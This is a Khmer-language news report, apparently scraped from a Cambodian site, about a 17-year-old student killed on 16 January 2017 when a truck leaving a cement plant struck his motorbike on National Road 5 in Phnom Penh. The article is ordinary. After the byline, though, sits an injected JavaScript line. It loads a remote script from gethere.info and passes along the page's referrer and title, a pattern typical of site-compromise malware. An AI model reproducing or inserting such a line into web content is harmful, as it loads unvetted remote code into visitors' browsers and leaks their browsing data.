Leng Navatra – Sidebar Out Left
Leng Navatra – Banner Out Right

សិស្សសាលាម្នាក់ស្លាប់ ខណ:ធ្វើដំណើរទៅសាលាត្រូវរថយន្តបុក

ភ្នំពេញៈយុវសិស្សម្នាក់បានស្លាប់បាត់បង់ជីវិតភ្លាមៗនៅនឹងកន្លែងកើតហេតុយ៉ាងអនោចអាធម៌ ខណៈដែលកំពុងជិៈម៉ូតូធ្វើដំណើរទៅសាលារៀនត្រូវបានរថយន្តបុកពីមុខពេញទំហឹងស្លាប់ភ្លាមៗតែម្តង។  ហេតុការណ៍គ្រោះថ្នាក់ចរាចណ៍គួរអោយរន្ធត់ខាងលើនះបានកើតឡើងកាលពីវេលាម៉ោង១និង២០នាទីរសៀល ថ្ងៃទី១៦ ខែមករា ឆ្នាំ២០១៧ ស្ថិតនៅចំនុចខាងមុខក្រុមហ៊ុនការដ្ឋានក្រឡុកសុីម៉ងត៍ តាមបណ្តោយផ្លូវជាតិលេខ៥ ក្រុម០២ ភូមិលូ ក្នុងសង្កាត់ស្វាយប៉ាក ខណ្ឌឬស្សីកែវ។

ជនរងគ្រោះដែលស្លាប់បាត់បង់ជីវិតឈ្មោះ ង្វៀង យំាុងថាន់ ភេទប្រុស អាយុ១៧ឆ្នាំ ជនជាតិវៀតណាម មុខរបរជាសិស្សរៀមថ្នាក់ទី៩នៃសាលាវិទ្យាល័យឬស្សីកែវ ស្នាក់នៅភូមិពោធិ៍មង្គល សង្កាត់ព្រែកព្នៅ ខណ្ឌព្រែកព្នៅ។

តាមប្រភពព័ត៌មានបានអោយដឹងថានៅមុនពេលកើតហេតុគេបានឃើញជនរងគ្រោះបានជិះម៉ូតូមួយគ្រឿងម៉ាក M.S.X ពណ៌ខ្មៅ ពាក់ស្លាកលេខភ្នំពេញ1GB. 8297 បើកបរតាមបណ្តោយផ្លូវ០៥ ក្នុងទិសដៅពីជើងទៅត្បូងធ្វើដំណើរចេញពីផ្ទៈក្នុងគោលបំណងទៅសាលារៀន​នៅវិទ្យាល័យឬស្សីកែវ លុះមកដល់ចំនុចកើតហេតុស្រាប់តែមានមួយរថយន្តមួយគ្រឿង ម៉ាកហុីយ៉ាន់ដាយ ពណ៌លឿង ពាក់ផ្លាកលេខកណ្តាល3A-0183
បើកបរក្នុងទិសដៅពីកើតទៅលិចចេញពីការដ្ឋានបេតុងរបស់ក្រុមហ៑ុនក្រឡុកសុីម៉ងត៍មកបុកនឹងម៉ូតូពេញទំហឹងតែម្តងបណ្តាលអោយជនរងគ្រោះស្លាប់បាត់បង់ជីវិតភ្លាមៗយ៉ាងអនោចអធម៌។

លុះមកដល់ត្រងចំណុកើតហេតុរថយន្តបានចេញពីក្រុមហ៑ុនក្រឡុកសុីម៉ង្គ់បណ្តាលឲ្យបុកនិងម៉ូតូតែម្តង។

ក្រោយពីកើតហេតុសមត្ថកិច្ចខណ្ឌឬស្សីកែវបានចុះមកភ្លាមៗជួយអន្តរាគមន៍បញ្ជៀសការកកស្ទៈចរារណ៍និងធ្វើការវាស់វែងយករថយន្តនិងម៉ូតូទៅរក្សារទុកនៅចរាចរណ៍ក្រុងបណ្តោះអាសន្នរងចាំការដោះស្រាយនៅពេលក្រោយ។ចំនែកសពត្រូវបានសម្ថកិច្ចទាក់ទងបងប្អូនសាច់ញាតិមកទទួលយកទៅធ្វើបុណ្យតាមប្រពៃណី។ដោយ៖ខេង ប៊ុនធឿន

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

អត្ថបទដែលជាប់ទាក់ទង

This website uses cookies to improve your experience. We'll assume you're ok with this, but you can opt-out if you wish. Accept Read More